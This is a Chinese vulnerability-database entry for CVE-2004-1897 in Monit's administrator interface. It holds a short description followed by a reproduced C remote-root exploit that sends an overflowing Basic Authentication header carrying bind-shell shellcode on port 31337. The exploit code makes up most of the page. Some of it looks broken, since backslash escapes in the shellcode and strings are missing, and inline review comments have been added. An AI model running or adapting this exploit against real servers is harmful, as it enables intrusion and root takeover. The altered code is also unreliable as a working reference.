多个Monit管理员接口远程漏洞
漏洞ID | 1107872 | 漏洞类型 | 未知 |
发布时间 | 2004-04-12 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2004-1897 |
CNNVD-ID | CNNVD-200412-868 |
漏洞平台 | Linux | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
Monit 1.4至4.2的管理员接口存在漏洞。远程攻击者可以通过发送不带密码的基本认证(Basic Authentication)请求造成拒绝服务(段错误)：该请求使Monit对空指针执行递减并引起越界读取。
|漏洞EXP
/*
* THE EYE ON SECURITY RESEARCH GROUP - INDIA
*
* www eos-india net poc 305monit.c
* Remote Root Exploit for Monit <= 4.2
* Vulnerability: Buffer overflow in the handling of Basic Authentication information.
* Server authenticates clients through:
* Authentication: Basic Base64Encode[UserName:Password]
* Here we are exploiting the insecure handling of username in Basic Authentication information to return
* control (EIP) to our payload.
*
* Nilanjan De [n2n linuxmail org] - Abhisek Datta [abhisek front ru]
*
* 06.04.2004
* www eos-india net
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
#define BUFF_SIZE 2048
#define PADDING 40
#define EXP_SIZE (256+4+PADDING)
#define MAX_ARCH 2
/* Target table used by show_help() (which walks it until arch is NULL) and
 * by main() (which bounds the chosen index with MAX_ARCH and copies 'ret'
 * into the request via make_http_request()). The initializer relies on
 * brace elision, i.e. no inner {} per element, which -Wmissing-braces
 * reports but which is valid C. */
struct eos{
char *arch; /* label printed in the target list */
unsigned long ret; /* value embedded in the request; printed as "RET" */
} targets[] = {
"Monit-4.2-Gentoo",
0xbf7fef02,
//-------------------------------
"Monit <=4.2 Crash",
0xbadc0ded,
NULL, /* sentinel entry: show_help() stops here */
0
};
/*
x86 Linux port-binding shell on port 31337
based on shellcode from www.shellcode.com.ar
with a few modifications by us
*/
/* NOTE(review): as rendered on this page the literals read "x31xc0" and so
 * on, with no backslash escapes, so this array holds those ASCII characters
 * rather than the bytes the mnemonic comments beside each line describe.
 * make_http_request() copies it with strcpy(), so it is treated as a
 * NUL-terminated string whose length must not exceed 256 (see the offset
 * arithmetic there). */
char shellcode[]=
/* sys_fork() */
"x31xc0" // xorl %eax,%eax
"x31xdb" // xorl %ebx,%ebx
"xb0x02" // movb $0x2,%al
"xcdx80" // int $0x80
"x38xc3" // cmpl %ebx,%eax
"x74x05" // je 0x5
/* sys_exit() */
"x8dx43x01" // leal 0x1(%ebx),%eax
"xcdx80" // int $0x80
/* setuid(0) */
"x31xc0" // xorl %eax,%eax
"x31xdb" // xorl %ebx,%ebx
"xb0x17" // movb $0x17,%al
"xcdx80" // int $0x80
/* socket() */
"x31xc0" // xorl %eax,%eax
"x89x45x10" // movl %eax,0x10(%ebp)(IPPROTO_IP = 0x0)
"x40" // incl %eax
"x89xc3" // movl %eax,%ebx(SYS_SOCKET = 0x1)
"x89x45x0c" // movl %eax,0xc(%ebp)(SOCK_STREAM = 0x1)
"x40" // incl %eax
"x89x45x08" // movl %eax,0x8(%ebp)(AF_INET = 0x2)
"x8dx4dx08" // leal 0x8(%ebp),%ecx
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80
"x89x45x08" // movl %eax,0x8(%ebp)
/* bind()*/
"x43" // incl %ebx(SYS_BIND = 0x2)
"x66x89x5dx14" // movw %bx,0x14(%ebp)(AF_INET = 0x2)
"x66xc7x45x16x7ax69" // movw $0x697a,0x16(%ebp)(port=31337)
"x31xd2" // xorl %edx,%edx
"x89x55x18" // movl %edx,0x18(%ebp)
"x8dx55x14" // leal 0x14(%ebp),%edx
"x89x55x0c" // movl %edx,0xc(%ebp)
"xc6x45x10x10" // movb $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16)
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80
/* listen() */
"x40" // incl %eax
"x89x45x0c" // movl %eax,0xc(%ebp)
"x43" // incl %ebx
"x43" // incl %ebx(SYS_LISTEN = 0x4)
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80
/* accept() */
"x43" // incl %ebx
"x89x45x0c" // movl %eax,0xc(%ebp)
"x89x45x10" // movl %eax,0x10(%ebp)
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80
"x89xc3" // movl %eax,%ebx
/* dup2() */
"x31xc9" // xorl %ecx,%ecx
"xb0x3f" // movb $0x3f,%al
"xcdx80" // int $0x80
"x41" // incl %ecx
"x80xf9x03" // cmpb $0x3,%cl
"x75xf6" // jne -0xa
/* execve() */
"x31xd2" // xorl %edx,%edx
"x52" // pushl %edx
"x68x6ex2fx73x68" // pushl $0x68732f6e
"x68x2fx2fx62x69" // pushl $0x69622f2f
"x89xe3" // movl %esp,%ebx
"x52" // pushl %edx
"x53" // pushl %ebx
"x89xe1" // movl %esp,%ecx
"xb0x0b" // movb $0xb,%al
"xcdx80"; // int $0x80
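/* Print the banner and, when 'opt' is non-zero, the usage line followed by
 * the target table. 'pr00gie' is argv[0] as passed by main(). The table walk
 * stops at the entry whose 'arch' is NULL. */
void show_help(char *pr00gie,u_short opt) {
    printf("==========> THE EYE ON SECURITY RESEARCH GROUP <==========n");
    printf("Monit <= 4.2 Remote Root Exploitn");
    printf("n2n[at]linuxmail[dot]org - abhisek[at]front[dot]run");
    printf("http://www.eos-india.netnn");
    if (!opt) {
        return;
    }
    printf("[usage]n");
    printf("%s [Remote Host] [Remote Port] [Target]n", pr00gie);
    printf("[Available Targets]n");
    for (int i = 0; targets[i].arch != NULL; i++) {
        /* 'ret' is an unsigned long; passing it to %p was a mismatched
         * conversion (undefined behavior), so print it with %lx instead. */
        printf("%d. - %st - 0x%lxn", i, targets[i].arch, targets[i].ret);
    }
}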
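/* Base 64 code ripped from monit src */
/**
 * Map one 6-bit value (0..63) to its base64 alphabet character.
 * Values above 63 all map to '/'.
 */
static char encode(unsigned char u) {
    if (u < 26) return (char)('A' + u);
    if (u < 52) return (char)('a' + (u - 26));
    if (u < 62) return (char)('0' + (u - 52));
    if (u == 62) return '+';
    return '/';
}
/**
 * Base64 encode 'size' bytes of 'src'. The caller must free the
 * returned string.
 * @param size The size of the data in src; 0 means "use strlen(src)"
 * @param src The data to be base64 encoded
 * @return NUL-terminated encoded string, or NULL when src is NULL, size is
 *         negative, the output length would overflow, or malloc() fails
 */
char *encode_base64(int size, unsigned char *src) {
    if (!src || size < 0) {
        return NULL;
    }
    size_t len = size ? (size_t)size : strlen((char *)src);
    /* Four output characters per (partial) group of three input bytes,
     * plus the terminator the original version forgot to write. */
    size_t groups = (len + 2) / 3;
    if (groups > (SIZE_MAX - 1) / 4) {
        return NULL;
    }
    char *out = malloc(groups * 4 + 1);
    if (!out) {
        return NULL;
    }
    char *p = out;
    for (size_t i = 0; i < len; i += 3) {
        unsigned char b1 = src[i];
        unsigned char b2 = (i + 1 < len) ? src[i + 1] : 0;
        unsigned char b3 = (i + 2 < len) ? src[i + 2] : 0;
        *p++ = encode((unsigned char)(b1 >> 2));
        *p++ = encode((unsigned char)(((b1 & 0x3) << 4) | (b2 >> 4)));
        /* Missing trailing bytes become '=' padding. */
        *p++ = (i + 1 < len) ? encode((unsigned char)(((b2 & 0xf) << 2) | (b3 >> 6))) : '=';
        *p++ = (i + 2 < len) ? encode((unsigned char)(b3 & 0x3f)) : '=';
    }
    *p = '\0';
    return out;
}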
/* Fill 'buff' ('size' bytes, zeroed first) with the request main() sends:
 * a GET for "/" with a Host header and a Basic Authorization value. The
 * value is the base64 encoding of 'exp_buff' (EXP_SIZE bytes): 0x90 fill,
 * 'shellcode' placed so that it ends just before offset 256, 4-byte copies
 * of *magic from offset 256 up to EXP_SIZE-5, then the ":x" suffix.
 * Neither exp_buff nor the encoded copy is freed; main() calls this once
 * and then exits. NOTE(review): as rendered here the "rn" literals carry
 * no backslashes, so the header lines are not CRLF-terminated. */
void make_http_request(char *buff,int size,char *host,unsigned long *magic) {
char *exp_buff;
char *exp_buff_encoded;
int i;
if (!(exp_buff=(char*)malloc(EXP_SIZE))){
perror("malloc()");
exit(1);
}
memset(exp_buff,0x90,EXP_SIZE);
/* Requires strlen(shellcode) <= 256; otherwise the destination lies before
 * the start of exp_buff. */
strcpy(exp_buff+256-strlen(shellcode),shellcode);
/* Only the first 4 bytes of *magic are copied per step. */
for(i=256;i<EXP_SIZE-5;i+=4)
memcpy(exp_buff+i,magic,4);
strcpy(exp_buff+EXP_SIZE-4,":x");
/* The result is used below as a C string, so it must be NUL-terminated. */
exp_buff_encoded=encode_base64(EXP_SIZE,exp_buff);
memset(buff,0x00,size);
sprintf(buff,"GET / HTTP/1.0rn");
/* Undefined behavior: 'buff' is both the destination and a %s source of
 * the same sprintf() call (overlapping objects, C11 7.21.6.6), and nothing
 * bounds the write to 'size'. */
sprintf(buff,"%sHost: %srn",buff,host);
sprintf(buff,"%sAuthorization: Basic %srnrnrn",buff,exp_buff_encoded);
}
/* Entry point: argv[1] host, argv[2] port, argv[3] index into targets[].
 * Resolves the host, connects over TCP, builds the request with
 * make_http_request() and sends it once. Every failure path calls exit(1). */
int main(int argc,char *argv[]) {
char *host;
char *b;
int rport;
int sockfd;
struct sockaddr_in sin; /* its header (<netinet/in.h>) is not among the includes at the top of this file */
struct hostent *h;
unsigned int n;
unsigned long magic;
if(argc != 4) {
show_help(argv[0],1);
exit(1);
}
host=argv[1];
rport=(atoi(argv[2])); /* atoi() reports no errors; an unparsable port becomes 0 */
n=atoi(argv[3]);
/* n is unsigned, so n<0 is always false; a negative argv[3] wraps to a
 * large value and is rejected by the MAX_ARCH bound instead. */
if((n >= MAX_ARCH)||(n<0)) {
printf("- Invalid targetn");
show_help(argv[0],1);
exit(1);
}
magic=targets[n].ret;
show_help(argv[0],0);
/* magic is an unsigned long, so %p is a mismatched conversion here. */
printf("-Using RET %pn",magic);
printf("Resolving %st",host);
h=gethostbyname(host);
if(!h) {
printf("[ERROR]nUnable to resolve: %sn",host);
exit(1);
}
else
printf("[DONE]n");
b=(char*)malloc(BUFF_SIZE);
if(!b) {
perror("malloc");
exit(1);
}
/* h_addr is the <netdb.h> compatibility alias for h_addr_list[0]. 'sin' is
 * never zeroed, so fields other than the three set here stay indeterminate. */
sin.sin_addr=*((struct in_addr*)h->h_addr);
sin.sin_family=AF_INET;
sin.sin_port=htons((u_short)rport); /* rport is not range-checked before this narrowing cast */
if((sockfd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){
perror("socket");
exit(1);
}
printf("Connecting to %s:%dt",host,rport);
if(connect(sockfd,(struct sockaddr*)&sin,sizeof(sin))<0) {
printf("[ERROR]nUnable to connect: %s:%dn",host,rport);
perror("connect");
exit(1);
}
else
printf("[DONE]n");
make_http_request(b,BUFF_SIZE,host,&magic);
/* send() returns ssize_t; comparing against the size_t strlen() promotes a
 * -1 result to an unsigned value, so a failed send takes the else branch. */
if(send(sockfd,b,strlen(b),0) == strlen(b))
printf("Successfully send exploit stringn");
else
printf("Failed sending exploit stringn");
close(sockfd); /* 'b' is never freed; the process returns right after */
return 0;
}
// milw0rm.com [2004-04-12]
|参考资料
来源:BID
名称:10051
链接:http://www.securityfocus.com/bid/10051
来源:SECUNIA
名称:11304
链接:http://secunia.com/advisories/11304
来源:BUGTRAQ
名称:20040405 Advisory: Multiple Vulnerabilities in Monit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108119149103696&w=2
来源:XF
名称:monit-basic-auth-dos(15734)
链接:http://xforce.iss.net/xforce/xfdb/15734